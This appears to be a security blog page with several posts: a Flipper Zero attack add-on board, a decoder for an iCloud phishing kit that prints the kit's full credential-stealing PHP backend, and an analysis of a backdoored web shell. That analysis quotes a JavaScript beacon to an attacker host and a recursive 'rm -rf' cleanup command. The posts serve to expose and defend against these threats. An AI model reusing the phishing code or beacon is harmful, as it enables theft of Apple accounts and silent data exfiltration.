3H34N Flipper Zero Board (Three in One – CC1101/NRF24L01/ESP32)

 3H34N Flipper Zero Board (Three in One – CC1101/NRF24L01/ESP32)

I'm thrilled to announce that the PCB for the Flipper Zero board has been successfully completed. This design integrates three modules into a single board.

As you can see, one side of the board houses two modules, while the other side holds one module. On the left, we have the NRF24L01; on the right, the CC1101; and on the back, the ESP32.

The NRF24L01 module is used for mouse jacking and operates on the Bluetooth frequency. Please note that when using Bluetooth, the NRF24L01 conflicts with the CC1101, so it’s necessary to remove the CC1101 from the board, using pin headers.

On the right, we have the CC1101 module, which helps increase the range of reception and transmission of sub-gigahertz radio signals. As you may know, the Flipper Zero already has an internal CC1101 module, but when you want to use sub-gigahertz, you should switch to the external module through the sub-gigahertz settings. You can also connect a custom antenna to extend the range.

On the back is the ESP32. Since the Flipper Zero doesn’t have an internal Wi-Fi chip, this module is essential for certain Wi-Fi attacks and is compatible with the [ESP32] Wi-Fi Marauder application on the Flipper Zero.

Additionally, we’ve included 3-position DIP switches to connect VCC power to each module as needed. This feature helps prevent conflicts and conserves battery life.

Requirements for Board:

NRF24L01+PA+LNA Module

CC1101 Module

ESP32-WROOM-32 - CP2102 Chip - 30pin Module

3 Way 2.54MM DIP switch

2x4 Pins header Female

2x4 Pins header Female

Female Header 2.54mm single row 15 Pin

Female Header 2.54mm single row 15 Pin

Strengths: Simple, affordable, portable module; three-in-one design.

Weaknesses: The NRF24L01 conflicts with the CC1101.

A special thanks to my friends Reza and Pouya for their participation and support throughout this journey.

CC1101/NRF24L01/ESP32 for Flipper Zero

Designed by 3H34N

"iServer/Powered By iSender Team" decoder

When your iPhone is lost, some hackers provide a fake website like Apple and message you on WhatsApp or some social media to reset your password to unlock your iPhone and Disable "find my iPhone".

I checked and decoded some fake website scripts that steal iCloud data from a script and are encoded by a custom PHP encoder called "iServer/Powered By iSender Team". 

decoder:

<?php
/*
 * Script to decrypt files encoded with iServer/Powered By iSender Team
*/

header('Content-type: text/html; charset=utf-8');

// Your encoded file path
$file = '/home/user/file.php';

/**
 * Return string after needle if it exists.
 */
function str_after($str, $needle, $last_occurence = false)
{
    $pos = strpos($str, $needle);

    if ($pos === false) return $str;

    return ($last_occurence === false)
        ? substr($str, $pos + strlen($needle))
        : substr($str, strrpos($str, $needle) + 1);
}

// get file content
$content = file_get_contents($file);

// split the eval section
$eval_code = str_after($content, "eval(");
$eval_code1 = strstr($eval_code, ")))", true);

// get first value
$value1 = str_after($eval_code1, "','"); //gets all text from needle on
$value2 = strstr($value1, "',", true); //gets all text before needle

// get two value
$value3 = str_after($value1, "','"); //gets all text from needle on
$value4 = strstr($value3, "'", true); //gets all text before needle

// decode the file
$myfile = file(str_replace('\\', '/', $file));
$file_ap = array_pop($myfile);
echo (base64_decode(strtr($file_ap, $value2, $value4)));

put your encoded file here:

// Your encoded file path
$file = '/home/user/file.php';

sample encoded file: 

decoded:

<?php
 $real_ip = real_ip(); $country_ip = ip_info($real_ip, "country"); $city = ip_info($real_ip, "city"); $url = htmlspecialchars($_SERVER["HTTP_REFERER"]); $uri = "#" . $url; $auth = end(explode("=", $url)); $lang = substr($_SERVER["HTTP_ACCEPT_LANGUAGE"], 0, 2); $IP = real_ip(); $browser = getbrowser(); $os = getos($_SERVER["HTTP_USER_AGENT"]); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://ip-api.com/json/" . $IP); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $ip_data_in = curl_exec($ch); curl_close($ch); $ip_data = json_decode($ip_data_in, true); $country = $ip_data["country"]; $city = $ip_data["city"]; $isp = $ip_data["org"]; $code = $ip_data["zip"]; $timezone = $ip_data["timezone"]; $headers.= 'From: iServer' . ""; $subjects = "True Login"; $subject = "False Login"; include "../authid.php"; if (!empty($_POST["appleID"]) && !empty($_POST["pw"])) { $pass = $_POST["pw"]; $pass = str_replace(array("&"), array("+"), $pass); $pass = str_replace(array("#"), array("%23"), $pass); $id = $_POST["appleID"]; include "fml.php"; if ($httpcode == 200 && stripos($myResult, "Invalid Apple ID/Password") == false && stripos($myResult, "Users Enter Correct Data.") == false && stripos($myResult, "This Apple ID is locked") == false) { $mess = "<p>✅ True Login ✅ 😃
		
📱 Link Code' => " . $ID . $auth. $imei. $ref."
-------------------------------------
🆔 Apple ID => " . $_POST['appleID'] . "
🔑 Password => " . $_POST['pw'] . "
-------------------------------------
💻 System Information 📱
-------------------------------------
🌎 IP Address => ".$IP."
📅 TimeStamp => ".date('d/m/Y H:i:s')."
🌐 Lang => " . $lang . "
🛫 Country => ".$country."
🏙 City => ".$city."
⌨️ Browser => ".$browser."
🖥 OS => ".$os."
📫 Postal Code => " . $code . "
🕛 Time Zone => " . $timezone . "
⚡ Connection => " . $isp . "
---------------------------------------
🆔 $twitter
🆔 $telegram
$copy"; $messBot = str_replace("</p>", "\n", $mess); $messBot = strip_tags($messBot); pronot("", $messBot); $remove = autoremove($_POST["appleID"], $_POST["pw"]); pronot("", "---------📴 Auto Remove Result---------\n$remove\n"); $file = fopen("../prolink/unlocked.txt","a"); fwrite($file, "<td>$id</td><td>$pass</td><td>$auth</td><td>$IP</td><td>$browser</td><td>$remove$myResult</td></tr>"); fwrite($file,"\r\n"); fclose($file); $file = fopen("../prolink/unlockedemail.txt","a"); fwrite($file, "<td>$id</td><td>$pass</td><td>$auth</td><td>$IP</td><td>$browser</td></tr>"); fwrite($file,"\r\n"); fclose($file); $file = fopen("../blacklist.txt","a"); fwrite($file, "$IP"); fwrite($file,"\r\n"); fclose($file); mail($to, $subjects, $messBot, $headers, $remove); echo "OK"; } else { if ($httpcode == 200 && stripos($myResult, "Invalid Apple ID/Password") == true && stripos($myResult, "This domain is not authorised to use SilentRemove API") == false && stripos($myResult, "This Apple ID is locked") == false) { $mess = "<p>❌️ False Login ❌️ 😧

📱 Link Code' => " . $ID . $auth. $imei."
-------------------------------------
🆔 Apple ID => " . $_POST['appleID'] . "
🔑 Password => " . $_POST['pw'] . "
-------------------------------------
💻 System Information 📱
-------------------------------------
🌎 IP Address => ".$IP."
📅 TimeStamp => ".date('d/m/Y H:i:s')."
🌐 Lang => " . $lang . "
🛫 Country => ".$country."
🏙 City => ".$city."
⌨️ Browser => ".$browser."
🖥 OS => ".$os."
📫 Postal Code => " . $code . "
🕛 Time Zone => " . $timezone . "
⚡ Connection => " . $isp . "
---------------------------------------
🆔 $twitter
🆔 $telegram
$copy"; $messBot = str_replace("</p>", "\n", $mess); $messBot = strip_tags($messBot); pronot("", $messBot); $file = fopen("../prolink/failed.txt","a"); fwrite($file, "<td>$id</td><td>$pass</td><td>$auth</td><td>$IP</td><td>$browser</td></tr>"); fwrite($file,"\r\n"); fclose($file); mail($to, $subject, $messBot, $headers); echo "INVALID"; } else { if ($httpcode == 200 && stripos($myResult, "Invalid Apple ID/Password") == false && stripos($myResult, "This domain is not authorised to use SilentRemove API") == false && stripos($myResult, "This Apple ID is locked") == true) { $mess = "<p>🔒 User entered locked Apple ID ❌️</p>"; $mess .= "<p></p>"; $mess .= "<p>🔗 Link Code : " . $auth. "</p>"; $mess .= "<p></p>"; $mess .= "<p>🆔 Apple ID : " . $_POST['appleID'] . "</p>"; $mess .= "<p>🔑 Password : " . $_POST["pw"] . "</p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>   ⌨ Owner System Info     </p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>📍 IP Address: " . $IP . "</p>"; $mess .= "<p>📱 Browser : " . $browser . "</p>"; $mess .= "<p>🖥 OS : " . $os . "</p>"; $mess .= "<p>🌐 Dev.Lang : " . $lang . "</p>"; $mess .= "<p>🌏 Country : " . $country . "</p>"; $mess .= "<p>🏙 City : " . $city . "</p>"; $mess .= "<p>📫 Postal Code : " . $code . "</p>"; $mess .= "<p>🕛 Time Zone : " . $timezone . "</p>"; $mess .= "<p>⚡ Connection : " . $isp . "</p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>   ☎️ Contact US     </p>"; $mess .= "<p>---------------------------------</p>"; $mess .= "<p>🆔 $twitter</p>"; $mess .= "<p>🆔 $telegram</p>"; $mess .= "<p>$copy</p>"; $messBot = str_replace("</p>", "\n", $mess); $messBot = strip_tags($messBot); pronot("", $messBot); echo "INVALID"; } } } } function AutoRemove($id, $pass) { $msg = file_get_contents("https://" . $_SERVER["SERVER_NAME"] . "/ickit/ilock.php?id=" . $id . "&pass=" . $pass); $msg = json_decode($msg); $owner_text = $msg->text; $owner_number = $msg->number; $Serial = $msg->newinfo; $myCheck["appleid"] = $id; $myCheck["password"] = $pass; $myCheck["key"] = "6DR-H5K-85D-ASA-FS7-3U8-YCC-MJB"; $myCheck["subscription"] = 1; $myCheck["format"] = "JSON"; $ch = curl_init("https://api.ifreeicloud.co.uk"); curl_setopt($ch, CURLOPT_POSTFIELDS, $myCheck); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $myResult = curl_exec($ch); $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpcode == 200 && stripos($myResult, "Invalid Apple ID/Password") == false && stripos($myResult, "This domain is not authorised to use SilentRemove API") == false && stripos($myResult, "This Apple ID is locked") == false) { $a = json_decode($myResult); $name = $a->name; $count = $a->count; if (0 < $count) { $text = "👤 Name: $name\n\n📱 Total Devices: $count\n\n🔠 Message: $owner_text\n🔢 Lost Mode Number: $owner_number\n\n"; $devices = $a->devices; foreach($devices as $device){ $aname = $device->name; $model = $device->model; $mode = $device->mode; $status = $device->status; $unlocked = $device->unlocked; if($unlocked){ $unlocked = 'Removed 📴 ✅'; } else { $unlocked = 'Unlock Failed 📶 ⛔'; } $text.= "Device Name: $aname\nDevice Model: $model\nDevice Mode: $mode\n$status+$unlocked\n\n"; } $Serials = "--★--Powered By iSender Team--★--\n\n" . $Serial . "\n\n"; return $text . $Serials; } else { return "This Apple ID no have devices."; } } else { return "INVALID"; } } function getOS($user_agent) { $os_platform = "Unknown OS Platform"; $os_array = array("/windows nt 10/i" => "Windows 10", "/windows nt 6.3/i" => "Windows 8.1", "/windows nt 6.2/i" => "Windows 8", "/windows nt 6.1/i" => "Windows 7", "/windows nt 6.0/i" => "Windows Vista", "/windows nt 5.2/i" => "Windows Server 2003/XP x64", "/windows nt 5.1/i" => "Windows XP", "/windows xp/i" => "Windows XP", "/windows nt 5.0/i" => "Windows 2000", "/windows me/i" => "Windows ME", "/win98/i" => "Windows 98", "/win95/i" => "Windows 95", "/win16/i" => "Windows 3.11", "/macintosh|mac os x/i" => "Mac OS X", "/mac_powerpc/i" => "Mac OS 9", "/linux/i" => "Linux", "/ubuntu/i" => "Ubuntu", "/iphone/i" => "iPhone", "/ipod/i" => "iPod", "/ipad/i" => "iPad", "/android/i" => "Android", "/blackberry/i" => "BlackBerry", "/webos/i" => "Mobile"); foreach ($os_array as $regex => $value) { if (preg_match($regex, $user_agent)) { $os_platform = $value; } } return $os_platform; } function getBrowser() { $agent = $_SERVER["HTTP_USER_AGENT"]; $name = "NA"; if (preg_match("/MSIE/i", $agent) && !preg_match("/Opera/i", $agent)) { $name = "Internet Explorer"; } else { if (preg_match("/Firefox/i", $agent)) { $name = "Mozilla Firefox"; } else { if (preg_match("/Chrome/i", $agent)) { $name = "Google Chrome"; } else { if (preg_match("/Safari/i", $agent)) { $name = "Apple Safari"; } else { if (preg_match("/Opera/i", $agent)) { $name = "Opera"; } else { if (preg_match("/Netscape/i", $agent)) { $name = "Netscape"; } } } } } } return $name; } function real_ip() { if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) { return $_SERVER["HTTP_X_FORWARDED_FOR"]; } if (isset($_SERVER["HTTP_X_REAL_IP"])) { return $_SERVER["HTTP_X_REAL_IP"]; } return $_SERVER["REMOTE_ADDR"]; } function ip_info($ip = NULL, $purpose = "location", $deep_detect = true) { $output = NULL; if (filter_var($ip, FILTER_VALIDATE_IP) === false) { $ip = $_SERVER["REMOTE_ADDR"]; if ($deep_detect) { if (filter_var($_SERVER["HTTP_X_FORWARDED_FOR"], FILTER_VALIDATE_IP)) { $ip = $_SERVER["HTTP_X_FORWARDED_FOR"]; } if (filter_var($_SERVER["HTTP_CLIENT_IP"], FILTER_VALIDATE_IP)) { $ip = $_SERVER["HTTP_CLIENT_IP"]; } } } $purpose = str_replace(array("name", "\n", "\t", " ", "-", "_"), NULL, strtolower(trim($purpose))); $support = array("country", "countrycode", "state", "region", "city", "location", "address"); $continents = array("AF" => "Africa", "AN" => "Antarctica", "AS" => "Asia", "EU" => "Europe", "OC" => "Australia (Oceania)", "NA" => "North America", "SA" => "South America"); if (filter_var($ip, FILTER_VALIDATE_IP) && in_array($purpose, $support)) { $ipdat = @json_decode(@file_get_contents("http://ip-api.com/json/" . $ip)); if (@strlen(@trim($ipdat->countryCode)) == 2) { switch ($purpose) { case "location": $output = array("city" => $ipdat->city, "state" => $ipdat->regionName, "country" => $ipdat->country, "country_code" => $ipdat->countryCode); break; case "address": $address = array($ipdat->countryName); if (1 <= @strlen($ipdat->regionName)) { $address[] = $ipdat->regionName; } if (1 <= @strlen($ipdat->city)) { $address[] = $ipdat->city; } $output = implode(", ", array_reverse($address)); break; case "city": $output = $ipdat->city; break; case "state": $output = $ipdat->regionName; break; case "region": $output = $ipdat->regionName; break; case "country": $output = $ipdat->country; break; case "countrycode": $output = $ipdat->countryCode; break; } } return $output; } return $output; } ?>

How Hackers Be Victim: Backdoor in PHP web shells

I decided to decode a PHP web shell that encoded by Fopo online encoder, it called "ATTACK SHELL PRiV9" or "K2ll33d Shell 2019" belong to "r00t.info".

PHP web shell:

Encoded source:

it might be interesting to you what we encounter!?

as you see it contains backdoor malware that copies itself with newsr.php in all directory of the website and sends a location and info to the address "http://r00t.info/ccb.js" and the mail: "byhero44@gmail.com" with the password "a4cd2905b660e8b1bc73a7c4571252da" that encrypted with the MD5 algorithm.

ccb.js contain:

a=new/**/Image();a.src='http://www.expoilt.com/yaz.php?a='+escape(location.href);

I changed all Http to Hxxp to prevent execute and harm your system, so if you want to run you need to back values to the original.

another name and address are: 

Turkey Cyber Army team

https://expoilt.com/yaz.php?a=

http://r00t.info/txt/lamer.txt

k2ll33d

Indoxploit Shell

Sym Bypass 403 Shell

Berandal Indoxploit Shell V2.1

Premium Wso Shell

Whmcs Killer

Mobile Shell V.05 2018 Private

K2ll33d Shell

3turr ~ Sh311

Server V-8 Attack Shell

Bypass shell

Wordpress Mass Change Password 2019

Smevk_pathan Shell V3 Bypass Shell

Leaf Php Mailer V.2.7

Bloodsecurity Bypass Shell

Anon Priv9 Shell

Wso Shell

R00t.info Priv7 Shell New 2016

Wso Shell 4.2.2

G5 Private Bypass Shell

 

If you have used it, You need to know that your entire website is infected.

the solution to clean:

Look for "newsr.php" files on all of your directory website to remove it.

if you are using Linux use this command:

find / -name newsr.php -exec rm -rf {} \;

Also, if you have uploaded the file, delete it completely.

And even delete the CGI shell files that it created by the PHP web shell.

you can find full source code at https://pastebin.com/bmrrDeAb

OWASP JoomScan Project in Pentestmag

our article published in Pentestmag

OWASP JoomScan Project

by Mohammad Reza Espargham, Ali Razmjoo, and Ehsan Nezami

JoomScan is not aiming just at testing different vulnerabilities and trying to simulate attacks, the process always begins with information gathering and it proceeds step by step following ethical hacking techniques. The information-gathering phase is not limited to the web application but also the webserver and domain, also misconfigurations, human-errors, and different possible risks on the product.

https://lnkd.in/dcwRNvD
other contributors Valerio Alessandroni, Marlene Ladendorff, PhD, Dr. Chuck Easttom, Daniel Benicio F Alves, LPIC, SUSE SCA, FORTINET NSE3, Kavya Pearlman ⚠️ Safety First ⚠️, Alex Halfin, Vinícius Vieira, Mostafa Mahmoud, Mohammad Reza Espargham, Ali Razmjoo, Ehsan Nezami, Ofer Tirosh, and Franciny S. hashtag#pentest hashtag#magazine hashtag#pentestmag hashtag#ActiveDirectory hashtag#AD hashtag#pentesting hashtag#DDoS hashtag#MachineLearning hashtag#Splunk hashtag#engineering hashtag#new hashtag#edition hashtag#cybersecurity hashtag#infosecurity hashtag#infosec